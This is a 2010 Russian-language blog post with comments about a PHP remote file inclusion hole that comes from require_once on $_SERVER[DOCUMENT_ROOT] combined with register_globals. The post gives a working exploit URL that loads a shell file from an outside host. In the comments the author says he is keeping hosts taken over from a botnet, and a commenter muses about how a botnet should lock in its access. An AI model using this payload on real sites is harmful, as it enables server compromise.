herm1t LIVE!ng room - /?_SERVER... [entries|archive|friends|userinfo]
herm1t

[ website | twilight corner in the herm1t's cave ]
[ userinfo | ljr userinfo ]
[ archive | journal archive ]

/?_SERVER... [Jan. 9th, 2010|09:09 pm]
Previous Entry Add to Memories Tell A Friend Next Entry
[Tags|, ]

В коде одного популярного сервиса есть такое:
require_once($_SERVER[DOCUMENT_ROOT]."somepath");
что в сочетании с register_globals даёт феерический эффект. пишем в строке броузера:
vulnerable-host.com/?_SERVER[DOCUMENT_ROOT]=http://ourhost.com/shell.txt?
сам попался Ж%-) пришлось чистить машину. Ж-)))
LinkLeave a comment

Comments:
From:(Anonymous)
Date:January 10th, 2010 - 12:01 am
(Link)
ни нада пользавать php по своей воле
[User Picture]
From:[info]herm1t
Date:January 10th, 2010 - 09:30 am
(Link)
от чего же? просто внимательнее нужно быть, хотя сам язык способствует производству говнокода - это да.
[User Picture]
From:[info]ketmar
Date:January 10th, 2010 - 06:23 pm
(Link)
а зачем register_globals-то? O_O
или так, по забывчивости осталось? %-)
[User Picture]
From:[info]herm1t
Date:January 10th, 2010 - 06:33 pm
(Link)
некоторые скриптики были написаны на скорую руку фиг знает сколько лет назад, и прижились ))) глобалс не мешал, потому что в коде не было кусков вроде вышепроцитированного, а тут тупо вставил код сервиса и попал на ужин к ботнету ))) зато сейчас иду по его следам, сношу кусочки бота, а хосты оставляю себе )))
[User Picture]
From:[info]ketmar
Date:January 10th, 2010 - 06:35 pm
(Link)
совсем разучились люди ботнеты писать. правильный ботнет должен был за собой дырки закрыть, вход забронировать. %-)
[User Picture]
From:[info]herm1t
Date:January 10th, 2010 - 06:40 pm
(Link)
да, там такое уебище индонезийское все это писало - понадергало говноскриптов и кое-как связало между собой. говнище всякое за собой тащит и даже прятаться не пытается. однако, работает. ))